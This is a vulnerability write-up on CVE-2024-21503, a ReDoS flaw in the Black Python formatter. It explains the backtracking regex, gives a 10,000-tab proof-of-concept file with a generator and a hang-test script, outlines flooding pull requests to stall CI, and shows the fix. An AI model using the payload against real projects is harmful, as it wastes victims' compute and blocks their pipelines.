Black versions prior to 24.3.0 are vulnerable to Regular Expression Denial of Service (ReDoS) when processing docstrings with specific whitespace patterns. An attacker can craft a file containing thousands of tabs that causes the formatter to hang, consuming 100% CPU. The fix replaces the regex with simple, linear-time string manipulation.
The world's most uncompromising Python code formatter compromised its own availability with a greedy regex. A deep dive into how overlapping character classes caused catastrophic backtracking in Black.
Black describes itself as "The uncompromising Python code formatter." It is the gold standard in the Python ecosystem, trusted by heavyweights like Dropbox, Mozilla, and Instagram to end bike-shedding debates over code style. You run `black .`, and your code transforms into a uniform, PEP 8-compliant masterpiece. It is supposed to save time. It is supposed to be safe.
But here is the irony: the tool designed to rigidly enforce structure was brought to its knees by an ambiguous definition of whitespace. In CVE-2024-21503, we find a classic Regular Expression Denial of Service (ReDoS) vulnerability buried in the logic that handles—of all things—docstring indentation.
This isn't a memory corruption bug or a remote code execution via pickle deserialization. It is a logic flaw where the parser gets lost in a maze of its own making. By feeding Black a Python file containing a specific sequence of tabs and spaces, an attacker can force the formatter into an infinite loop of CPU cycles, effectively freezing any CI/CD pipeline, pre-commit hook, or web service relying on it. It turns out, being uncompromising on style requires a very compromising regex.
To understand this bug, you have to understand why regular expressions are often the wrong tool for the job. The vulnerability resides in `src/black/strings.py`, inside a function meant to expand tabs in docstrings while preserving relative indentation. The developers needed to find the first non-whitespace character in a line that might start with a mix of tabs and spaces.
They chose this regex:

```python
FIRST_NON_WHITESPACE_RE = re.compile(r"\s*\t+\s*(\S)")
```

At first glance, it looks harmless: optional whitespace (`\s*`), followed by at least one tab (`\t+`), then more optional whitespace (`\s*`), and finally a captured non-whitespace character (`(\S)`).
Here is the trap: in Python's regex engine (and many others), the character class `\s` (whitespace) includes `\t` (tab). This creates an ambiguity. If the engine sees a sequence like `\t\t\t`, it doesn't know whether the second tab belongs to the first `\s*`, the middle `\t+`, or the final `\s*`.
When the regex engine encounters a string of thousands of tabs with no trailing non-whitespace character (which the final `(\S)` group requires), the match is doomed to fail, but the engine only learns this after backtracking through every way of splitting the tab run among the three overlapping groups: one tab to the first `\s*` and the rest to `\t+`, then two tabs to the first `\s*`, and so on. The number of splits to try explodes with input length. This is known as catastrophic backtracking.
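The overlap, and the resulting ambiguity, can be seen in a quick experiment (a minimal sketch, not from the Black codebase; the grouped pattern below just makes the engine's split visible):

```python
import re

# \s is a superset of \t: a tab is itself whitespace
assert re.fullmatch(r"\s", "\t") is not None

# Capture each part of the pattern separately to see how the engine
# splits a run of three tabs among the three overlapping groups.
# The greedy first pass gives two tabs to the leading \s*, but many
# other splits exist -- and on failure the engine tries them all.
m = re.match(r"(\s*)(\t+)(\s*)", "\t\t\t")
print(m.groups())  # ('\t\t', '\t', '')
```

Here the match succeeds, so only one split is ever tried; it is the required `(\S)` at the end of Black's pattern that turns the other splits into wasted work.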
Let's look at the vulnerable code in `src/black/strings.py`. The function `lines_with_leading_tabs_expanded` iterates over the lines of a docstring and applies the regex.
```python
# Vulnerable implementation in Black < 24.3.0
def lines_with_leading_tabs_expanded(s: str) -> List[str]:
    lines = []
    for line in s.splitlines():
        # This match attempt is where the CPU dies
        match = FIRST_NON_WHITESPACE_RE.match(line)
        if match:
            first_non_whitespace_idx = match.start(1)
            lines.append(
                line[:first_non_whitespace_idx].expandtabs()
                + line[first_non_whitespace_idx:]
            )
        else:
            lines.append(line)
    return lines
```

The issue is strictly in `FIRST_NON_WHITESPACE_RE.match(line)`. Because the regex is anchored to find a specific structure (tabs sandwiched by whitespace, ending in a visible character), an input that almost matches but fails at the very end causes the engine to explore every possible permutation of the "sandwich" before giving up.
If you have 5,000 tabs, the number of permutations is astronomical. The computer isn't frozen; it's just working very, very hard on a problem that has no solution.
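The asymmetry is easy to demonstrate with the same pattern (a minimal sketch, safe to run because the failing input is kept small): when a visible character terminates the run, the greedy first attempt succeeds immediately; it is only the must-fail, tabs-only case that forces the engine to enumerate splits.

```python
import re

REGEX = re.compile(r"\s*\t+\s*(\S)")

# With a non-whitespace character at the end, the first greedy
# attempt succeeds and returns instantly:
m = REGEX.match("\t" * 50 + "x")
print(m.start(1))  # 50 -- index of the first non-whitespace character

# Tabs only: the match fails. Fast at n=50; catastrophic at n=5000.
assert REGEX.match("\t" * 50) is None
```

Bump the `50` in the failing case toward 5,000 and the runtime climbs dramatically, while the succeeding case stays instantaneous at any length.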
Exploiting this is trivially easy. You don't need shellcode, you don't need memory addresses, and you don't need network access. You just need to convince a developer or a server to format a file.
Imagine a large open-source project that enforces Black formatting via GitHub Actions. An attacker submits a Pull Request adding a "documentation update." The file contains a docstring with a malicious payload.
```python
# poc.py -- the middle line of this docstring is 10,000 literal tab
# characters, written below as a Python expression for readability
"""
Here is a docstring that will never finish formatting.
" + ("\t" * 10000) + "
"""
```

When the CI runner executes `black .`, it hits this file. It reaches the line with 10,000 tabs and attempts to match `FIRST_NON_WHITESPACE_RE`. The regex engine enters a state of deep meditation. The CI job hangs until it hits the platform's timeout (often 6 hours). If the attacker does this across multiple PRs or repositories, they can burn through the victim's compute credits or DoS their build infrastructure.
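Generating the payload file programmatically avoids an editor silently converting the tabs; a small generator sketch (the filename `poc.py` follows the example above):

```python
# Build the malicious docstring: the middle line is 10,000 literal
# tab characters with no non-whitespace character after them.
payload = (
    '"""\n'
    "Here is a docstring that will never finish formatting.\n"
    + "\t" * 10000
    + '\n"""\n'
)

with open("poc.py", "w") as f:
    f.write(payload)
```

The trailing newline after the tab run is what matters: the tab-only line has no `\S` for the capture group, so the match on that line must fail.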
Here is a script to verify the hang locally (do not run this on production systems):
```python
import re
import time

# The vulnerable regex
REGEX = re.compile(r"\s*\t+\s*(\S)")

# The malicious input: lots of tabs, NO non-whitespace char at the end
payload = "\t" * 5000

print("Attempting match... (Press Ctrl+C to abort)")
start = time.time()
try:
    REGEX.match(payload)
except KeyboardInterrupt:
    print("\nAborted!")
print(f"Finished in {time.time() - start}s")
```

The remediation for this vulnerability is a perfect example of "Keep It Simple, Stupid." The Black maintainers realized that using a regex to find the first non-whitespace character was overkill. Python strings have built-in methods for this that are implemented in C and run in linear time.
In version 24.3.0, they completely removed the regex logic. Here is the diff from commit f00093672628d212b8965a8993cee8bedf5fe9b8:
```diff
-        match = FIRST_NON_WHITESPACE_RE.match(line)
-        if match:
-            first_non_whitespace_idx = match.start(1)
-            lines.append(
-                line[:first_non_whitespace_idx].expandtabs()
-                + line[first_non_whitespace_idx:]
-            )
+        stripped_line = line.lstrip()
+        if not stripped_line or stripped_line == line:
+            lines.append(line)
+        else:
+            prefix_length = len(line) - len(stripped_line)
+            prefix = line[:prefix_length].expandtabs()
+            lines.append(prefix + stripped_line)
```

Instead of a backtracking nightmare, they now just `lstrip()` the line. This removes all leading whitespace. Subtracting the length of the stripped line from the length of the original gives the index of the first real character. Simple math. O(n) complexity. No backtracking.
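For reference, here is the patched logic assembled from the diff into a standalone, runnable function (a sketch; Black's actual module contains additional surrounding code):

```python
from typing import List


def lines_with_leading_tabs_expanded(s: str) -> List[str]:
    """Expand tabs in each line's leading whitespace, leaving the rest intact."""
    lines = []
    for line in s.splitlines():
        stripped_line = line.lstrip()
        if not stripped_line or stripped_line == line:
            # Whitespace-only line, or no leading whitespace at all:
            # nothing to expand. This branch also handles the ReDoS
            # payload (a tab-only line) in linear time.
            lines.append(line)
        else:
            prefix_length = len(line) - len(stripped_line)
            prefix = line[:prefix_length].expandtabs()
            lines.append(prefix + stripped_line)
    return lines


# Leading tab expands (default tab size 8); interior tabs are preserved:
print(lines_with_leading_tabs_expanded("\tfoo\tbar"))
```

Feeding it the pathological input returns instantly: a line of 5,000 tabs strips to the empty string and is appended unchanged.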
This fix serves as a reminder to developers: just because you can solve it with a regex doesn't mean you should.
CVSS vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

| Product | Affected Versions | Fixed Version |
|---|---|---|
| `black` (Python Software Foundation) | < 24.3.0 | 24.3.0 |
| Attribute | Detail |
|---|---|
| CWE | CWE-1333 (Inefficient Regular Expression Complexity) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network / Local (via file) |
| Complexity | Low |
| EPSS Score | 0.06% |
| Impact | Denial of Service (Availability) |
| Exploit Maturity | Proof of Concept Available |
The software uses a regular expression that can be forced to process input in exponential time, leading to Denial of Service.